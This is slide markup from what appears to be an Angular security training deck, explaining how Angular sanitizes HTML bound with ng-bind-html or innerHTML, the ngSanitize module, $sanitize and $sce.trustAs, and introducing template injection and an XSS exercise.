                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="457301">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Html content</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="50"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;element </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ng-bind-html</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>"&gt;&lt;/element&gt;</a:t>
                      </a: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fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>&lt;element </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" err="1" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>innerHTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>expression</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="fr-FR" sz="1100" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>"&gt;&lt;/element&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1"/>
                </a:tc>
              </a:tr>
              <a:tr h="504056">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr" anchorCtr="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>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anchor="ctr" anchorCtr="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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38465"/>
            <a:ext cx="7560840" cy="360040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>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593" y="3363838"/>
            <a:ext cx="5346727" cy="308339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>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824" y="4387691"/>
            <a:ext cx="3259870" cy="331632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17"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31318" y="1966210"/>
            <a:ext cx="96202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0232" y="1981592"/>
            <a:ext cx="816726" cy="241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2532" y="3744185"/>
            <a:ext cx="9036496" cy="6277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4972" y="1902389"/>
            <a:ext cx="9036496" cy="13174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901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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Angular Protection</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07504" y="987574"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t>Sanitization </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>            Enabled by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>default when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>you bind HTML into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>            Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ngSanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>module </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Make sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>you do this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>via Angular, not by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>calling the DOM API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Bypass sanitization (use with care)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Only intended to mark static snippets of code as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>safe, hence the name </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828925"/>
            <a:ext cx="5324475" cy="2314575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>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518" y="1282148"/>
            <a:ext cx="555220" cy="164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1557894"/>
            <a:ext cx="560212" cy="149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8414" y="2884590"/>
            <a:ext cx="948546" cy="280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ZoneTexte 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6328786" y="3198657"/>
            <a:ext cx="2412268" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0699F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0699F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0699F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0699F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0699F4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sce.trustAs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>functions</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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97995" y="2884591"/>
            <a:ext cx="1050469" cy="280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103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915566"/>
            <a:ext cx="8856984" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PW - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Exercises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t>	Follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>practical_works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>/PW-XSS.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" smtClean="0"/>
              <a:t> instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4017906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1851670"/>
            <a:ext cx="6696744" cy="1102519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27543606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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6653048" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript frameworks</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07504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>JavaScript frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>HTML5 / JavaScript / Ajax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>SPA / RESTful API / Stateless architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Modern browser features </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
